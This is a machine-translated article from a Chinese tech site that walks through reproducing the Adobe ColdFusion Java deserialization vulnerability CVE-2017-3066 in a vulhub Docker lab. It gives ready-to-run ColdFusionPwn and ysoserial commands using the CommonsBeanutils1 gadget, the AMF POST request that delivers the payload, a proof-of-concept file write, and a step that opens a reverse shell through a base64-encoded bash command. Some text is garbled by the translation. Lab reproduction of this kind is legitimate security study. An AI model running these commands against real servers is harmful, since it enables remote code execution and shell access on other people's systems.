Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to achieve Adobe ColdFusion deserialization CVE-2017-3066 vulnerability reproduction, the content of the article is of high quality, so the editor will share it for you to do a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Adobe ColdFusion deserialization vulnerability recurrence (CVE-2017-3066)

Adobe ColdFusion is a dynamic Web server product of Adobe Company in the United States. CFML (ColdFusion Markup Language) is a programming language for Web applications.

A java deserialization vulnerability exists in Adobe ColdFusion. An attacker can exploit this vulnerability to execute arbitrary code or cause a denial of service in the context of the affected application. The following versions are affected: Adobe ColdFusion (2016 release) Update 3 and earlier, ColdFusion 11 Update 11 and earlier, ColdFusion 10 Update 22 and earlier.

0x00 vulnerability environment

Start the vulnerability environment:

Docker-compose up-d

Wait a few minutes for the environment to start successfully. Access http://your-ip:8500/CFIDE/administrator/index.cfm and enter the password vulhub to install Adobe ColdFusion successfully.

0x01 vulnerability recurrence 1. Command execution write file

We use the ColdFusionPwn tool in the reference link to generate the POC:

Ysoserial

ColdFusionPwn

Java-cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner-e CommonsBeanutils1 'touch / tmp/success' poc.ser

POC is generated in the poc.ser file, and the POC is sent as a packet body to http://your-ip:8500/flex2gateway/amf Magazine contentMurType as application/x-amf:

POST / flex2gateway/amf HTTP/1.1Host: your-ip:8500Accept-Encoding: gzip, deflateAccept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: closeContent-Type: application/x-amfContent-Length: 2853 [. Poc...]

Enter the container and find that / tmp/success has been created successfully:

2. Rebound shell

Change POC to rebound command, and successfully get shell:

!!! Be careful! Here you need to encode the command of bouncing shell with base64!

Root@kali:~/ha/pocs/CVE-2017-3066-Adobe-ColdFusion-unserialization# java-cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner-e CommonsBeanutils1 "bash-c {echo,xxxxxxxxxxxxxxxxxxxxxxx} | {base64,-d} | {bash,-i}" t.ser

On how to achieve Adobe ColdFusion deserialization CVE-2017-3066 vulnerability recurrence is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.